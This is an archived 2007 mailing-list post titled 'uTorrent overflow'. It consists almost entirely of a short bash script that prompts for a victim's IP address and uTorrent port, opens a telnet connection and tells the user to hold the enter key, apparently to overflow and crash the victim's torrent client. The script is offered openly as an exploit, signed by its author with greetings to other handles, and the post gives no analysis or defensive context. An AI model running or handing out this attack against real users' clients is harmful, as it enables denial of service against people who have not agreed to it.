|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
uTorrent overflow
Dj.r4iDeN
gmail.com
Date: Sat Jun 02 2007 - 15:15:09 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
#!/bin/bash
#
# uTorrent overflow
# mail: dj.r4iden[at]gmail.com
# greet to : StrikerX , St0rM-MaN , MedoZero , hack_egy ,CPU
# you must kno the victim ip and the port he use in uTorrent
#
clear
echo "Enter your victam IP?"
echo " "
read victamIP
victamIP=$victamIP
echo " Enter your victam port?"
echo " "
read victamport
victamport=$victamport
echo "after you connect hold the enter key"
echo -n "you wanna connect now?(y/n)"
read X
if [ "$X" = "y" ];then
telnet $victamIP $victamport
elif [ "$X" = "n" ];then
echo " good bye"
echo -n "exploit by dj.r4iden[at]gmail.com"
fi
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]